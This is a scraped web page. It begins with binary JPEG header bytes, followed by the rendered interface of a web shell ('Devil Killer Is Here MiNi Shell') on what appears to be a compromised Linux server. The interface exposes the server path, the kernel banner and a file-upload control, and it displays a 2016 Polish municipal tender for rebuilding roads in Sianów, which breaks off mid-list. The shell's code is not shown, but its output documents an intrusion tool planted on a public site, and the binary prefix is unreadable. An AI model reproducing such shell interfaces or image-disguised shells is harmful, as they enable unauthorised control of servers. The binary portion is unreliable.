JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160331/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160331/72072-N-2016.html

<p class="kh_header"><b>Sianów: PRZEBUDOWA DRÓG GMINNYCH Z PŁYT YOMB</b><br>
<b>Numer ogłoszenia: 72072 - 2016; data zamieszczenia: 31.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sianów , ul. Armii Polskiej 30, 76-004 Sianów, woj. zachodniopomorskie, tel. 094 3185281, faks 094 3185320.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sianow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA DRÓG GMINNYCH Z PŁYT YOMB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Przebudowa dróg gminnych, obejmująca wykonanie dróg o nawierzchni z płyt YOMB w układzie dwupasowym - zgodnie z przekrojem  konstrukcyjnym stanowiącym załącznik do SIWZ. 

2.	Przetarg polega na określeniu ceny 1 metra bieżącego wykonania drogi z płyt YOMB, według opisanej technologii z uwzględnieniem odległości miejsca wykonywania robót od siedziby Zamawiającego. 

Opis przedmiotu zamówienia obejmuje wykonanie dróg:
Część I:

SIANÓW - ul. Miła (dz. nr 980, 979, 735, 736, obr. nr 3 m. Sianów)

- nawierzchnia z płyt betonowych typu JOMB  C -  szacunkowa długość ~ 220 mb.
Część II:
SIANÓW - ul. Łubuszan (dz. nr 933, 972/2, 973, obr. nr 3 m. Sianów)
- nawierzchnia z płyt betonowych typu JOMB  C -  szacunkowa długość ~ 280 mb. 
Część III:
SIANÓW - ul. Dębowa (dz. nr 285/1 obr. Skibno i 235, obr. nr 3 m. Sianów)
- nawierzchnia z płyt betonowych typu JOMB  C -  szacunkowa długość ~ 100 mb. 
Część  IV
SKWIERZYNKA  (dz. nr 169/1 obr. Skwierzynka)
- nawierzchnia z płyt betonowych typu JOMB  C-  szacunkowa długość ~ 250 mb
3.	Przedmiotem zamówienia jest zawarcie umowy na przebudowę dróg gminnych dla poszczególnych zadań, polegający na ułożeniu płyt YOMB. Zakres prac określa przedmiar stanowiący element pomocniczy przy sporządzaniu kosztorysu ofertowego. 
4.	Zamawiający zastrzega sobie prawo do zmniejszenia ilość dróg przeznaczonych do przebudowy. Ograniczenie przedmiotu umowy, nie stanowi niewykonania lub nienależytego wykonania zobowiązania, a w związku z tym nie jest podstawą do podnoszenia jakichkolwiek roszczeń w stosunku do Zamawiającego. 
5.	Potwierdzeniem wykonania robót, będzie protokół odbioru robót podpisany przez strony.
6.	Elementami składowymi przedmiotu zamówienia są wszelkie roboty i usługi towarzyszące realizacji robót, w szczególności: wywóz urobku na odległość  do 2 km., przejazd, transport maszyn, dokumentacja geodezyjna powykonawcza,  odszkodowanie za powstałe szkody podczas robót, itp.  
7.	Odpowiedzialność Wykonawcy z tytułu gwarancji oraz rękojmi na wykonany przedmiot zamówienia wynosi 60 miesięcy.
8.	Wszelkie szkody wynikłe w trakcie realizacji umowy w tym w obrębie sąsiednich terenów stanowiących własność osób fizycznych i prawnych obciążają Wykonawcę.
9.	Wykonawca bierze na siebie pełną odpowiedzialność za właściwe wykonanie robót tj.: zapewnienie warunków bezpieczeństwa osób przebywających na placu budowy i mienia oraz za metody organizacyjno-techniczne.
10.	W czasie realizacji robót Wykonawca będzie utrzymywać teren budowy w stanie wolnym od przeszkód komunikacyjnych. Istniejące w sąsiedztwie planowanej inwestycji posesje są zamieszkałe. Zobowiązuje się Wykonawcę do organizowania i wykonywania umowy w sposób nie utrudniający dostępu do nieruchomości. Zamawiający nie przewiduje z tego tytułu żadnych dodatkowych zapłat..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości:  
Część I    - 1 000,00 zł
Część II   - 1 500,00 zł
Część III  -   500,00 zł
Część IV - 1 500,00 zł
Wadium musi obejmować cały okres związania ofertą  i może być wniesione
    w jednej lub kilku następujących formach:
w pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).       
   3)   Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto:
Bank Spółdzielczy w Sławnie, ul. Kopernika 5, 76-100 Sławno, Oddział w Sianowie, ul. Morska 7, 76-004: Sianów - 84 9317 1012 0050 9760 2000 0010
z dopiskiem  Przebudowa dróg gminnych, część 
4) Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego przy czym musi to nastąpić do terminu składania ofert. Kopię dowodu dokonania przelewu należy dołączyć do oferty.
5)  Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność
za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone 
w art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
6) Dowód wniesienia wadium zgodnie z zasadami wskazanymi powyżej, należy złożyć   wraz z ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania oceny w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku - posiadania wiedzy i doświadczenia - wykonawca ubiegający się o udzielenie zamówienia musi wykazać, iż wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwie) roboty budowlane (umowy na roboty budowlane) rozumiane jako najważniejsze roboty polegające na wykonaniu remontu dróg , przebudowie dróg o wartości łącznej co najmniej 100 000,- PLN (sto tysięcy złotych) netto.
Zamawiający uzna za spełnienie warunku wykonanie powyższych prac jako jedno zadanie (o łącznej wartości minimum  100 000,00 zł), wykonane w ramach jednej umowy lub jako zadania niezależne, wykonane w ramach odrębnych  umów ( każda o wartości minimum 50.000,00).
W wykazie robót należy podać wartość w/w robót.  Łączna ich wartość powinna wynosić minimum 100.000,00zł .
       Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie           spełnianie w/w warunku.
Ocena w/w warunku nastąpi wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania oceny w zakresie dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia  
w zakresie objętym zamówieniem, które będą pełniły funkcje:
-  kierownika budowy.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie spełnianie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia.
Ocena w/w warunku nastąpi wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową 
z uwzględnieniem potrącenia na inne zobowiązania umowne w wysokości minimum 100.000,00 zł zapewniając tym zdolność do finansowania robót w trakcie realizacji pomiędzy płatnościami ze strony Zamawiającego.
Ocena w/w warunku nastąpi wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana nieistotnych postanowień zawartej umowy może nastąpić wyłącznie zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
2.	Pod rygorem nieważności strony mogą dokonać zmiany istotnych warunków umowy w formie pisemnej w przypadkach określonych w umowie.
3.	Prawa do odstąpienia Zamawiający może wykonywać w terminie 45 dni od dnia ujawnienia istnienia podstaw podstawy do złożenia oświadczenia o odstąpieniu od umowy.
4.	Ewentualne oświadczenia o odstąpieniu od umowy strony mogą składać sobie wzajemnie ze skutkiem na przyszłość lub ze skutkiem od dnia podpisania umowy stosownie do treści oświadczenia o odstąpieniu od umowy.
5.	Strony umowy zobowiązują się wzajemnie informować o wszelkich zmianach mogących mieć wpływ na wykonanie treści umowy, w tym w szczególności zmianie adresu miejsca zamieszkania lub siedziby a wysłanie pisma na ostatni znany adres strony uznają za skuteczne doręczenie.
6.	Zamawiający dopuszcza również możliwość istotnych zmian postanowień umowy zawartej z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie :
1)	osób sprawujących bezpośredni nadzór nad realizacją przedmiotu zamówienia (kierownika budowy, inspektora nadzoru inwestorskiego). Wniosek Wykonawcy w sprawie zmiany kierownika budowy wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego,
2)	zmiana podwykonawcy wskazanego w ofercie udostępniającego zasoby lub rezygnacja z tego podwykonawcy, pod warunkiem że Wykonawca wykaże Zamawiającemu że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania ,
3)	powierzenia podwykonawcy realizacji części zamówienia w sytuacji gdy Wykonawca w ofercie zobowiązał się samodzielnie realizować zamówienie.
6.	Warunkiem zmian, o których mowa w ust. 2 i 6 będzie zaistnienie szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sianow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Sianowie
76-004 Sianów, ul. Armii Polskiej 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2016 godzina 12:00, miejsce: Urząd Gminy i Miasta w Sianowie
76-004 Sianów, ul. Armii Polskiej 30, pokój nr 12 ( sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SIANÓW - ul. Miła (dz. nr 980, 979, 735, 736, obr. nr 3 m. Sianów)
- nawierzchnia z płyt betonowych typu YOMB C-  szacunkowa długość ~ 220 mb..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający zastrzega sobie obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia na roboty budowlane:
a)	warstwy odsączającej;
b)	warstwy z kruszywa łamanego stabilizowanego mechanicznie 
c)	ułożenia płyt betonowych;
określonych w przekroju konstrukcyjnym stanowiącym załącznik do SIWZ
1)	Przedmiotem zamówienia jest zawarcie umowy na przebudowę dróg gminnych dla poszczególnych zadań, polegający na ułożeniu płyt YOMB. Zakres prac określa przedmiar stanowiący element pomocniczy przy sporządzaniu kosztorysu ofertowego. 
2)	Zamawiający zastrzega sobie prawo do zmniejszenia ilość dróg przeznaczonych do przebudowy. Ograniczenie przedmiotu umowy, nie stanowi niewykonania lub nienależytego wykonania zobowiązania, a w związku z tym nie jest podstawą do podnoszenia jakichkolwiek roszczeń w stosunku do Zamawiającego. 
3)	Potwierdzeniem wykonania robót, będzie protokół odbioru robót podpisany przez strony.
4)	Elementami składowymi przedmiotu zamówienia są wszelkie roboty i usługi towarzyszące realizacji robót, w szczególności: wywóz urobku na odległość  do                2 km., przejazd, transport maszyn, dokumentacja geodezyjna powykonawcza,  odszkodowanie za powstałe szkody podczas robót, itp.  
5.	Odpowiedzialność Wykonawcy z tytułu gwarancji oraz rękojmi na wykonany przedmiot zamówienia wynosi 60 miesięcy.
6.	Wszelkie szkody wynikłe w trakcie realizacji umowy w tym w obrębie sąsiednich terenów stanowiących własność osób fizycznych i prawnych obciążają Wykonawcę.
7.	Wykonawca bierze na siebie pełną odpowiedzialność za właściwe wykonanie robót tj.: zapewnienie warunków bezpieczeństwa osób przebywających na placu budowy i mienia oraz za metody organizacyjno-techniczne.
8.	W czasie realizacji robót Wykonawca będzie utrzymywać teren budowy w stanie wolnym od przeszkód komunikacyjnych. Istniejące w sąsiedztwie planowanej inwestycji posesje są zamieszkałe. Zobowiązuje się Wykonawcę do organizowania i wykonywania umowy w sposób nie utrudniający dostępu do nieruchomości. Zamawiający nie przewiduje z tego tytułu żadnych dodatkowych zapłat..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> SIANÓW - ul. Łubuszan (dz. nr 933, 972/2, 973, obr. nr 3 m. Sianów)
- nawierzchnia z płyt betonowych typu YOMB  C-  szacunkowa długość ~ 280 mb..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający zastrzega sobie obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia na roboty budowlane:
a)	warstwy odsączającej;
b)	warstwy z kruszywa łamanego stabilizowanego mechanicznie 
c)	ułożenia płyt betonowych;
określonych w przekroju konstrukcyjnym stanowiącym załącznik do SIWZ
1)	Przedmiotem zamówienia jest zawarcie umowy na przebudowę dróg gminnych dla poszczególnych zadań, polegający na ułożeniu płyt YOMB. Zakres prac określa przedmiar stanowiący element pomocniczy przy sporządzaniu kosztorysu ofertowego. 
2)	Zamawiający zastrzega sobie prawo do zmniejszenia ilość dróg przeznaczonych do przebudowy. Ograniczenie przedmiotu umowy, nie stanowi niewykonania lub nienależytego wykonania zobowiązania, a w związku z tym nie jest podstawą do podnoszenia jakichkolwiek roszczeń w stosunku do Zamawiającego. 
3)	Potwierdzeniem wykonania robót, będzie protokół odbioru robót podpisany przez strony.
4)	Elementami składowymi przedmiotu zamówienia są wszelkie roboty i usługi towarzyszące realizacji robót, w szczególności: wywóz urobku na odległość  do                2 km., przejazd, transport maszyn, dokumentacja geodezyjna powykonawcza,  odszkodowanie za powstałe szkody podczas robót, itp.  
5.	Odpowiedzialność Wykonawcy z tytułu gwarancji oraz rękojmi na wykonany przedmiot zamówienia wynosi 60 miesięcy.
6.	Wszelkie szkody wynikłe w trakcie realizacji umowy w tym w obrębie sąsiednich terenów stanowiących własność osób fizycznych i prawnych obciążają Wykonawcę.
7.	Wykonawca bierze na siebie pełną odpowiedzialność za właściwe wykonanie robót tj.: zapewnienie warunków bezpieczeństwa osób przebywających na placu budowy i mienia oraz za metody organizacyjno-techniczne.
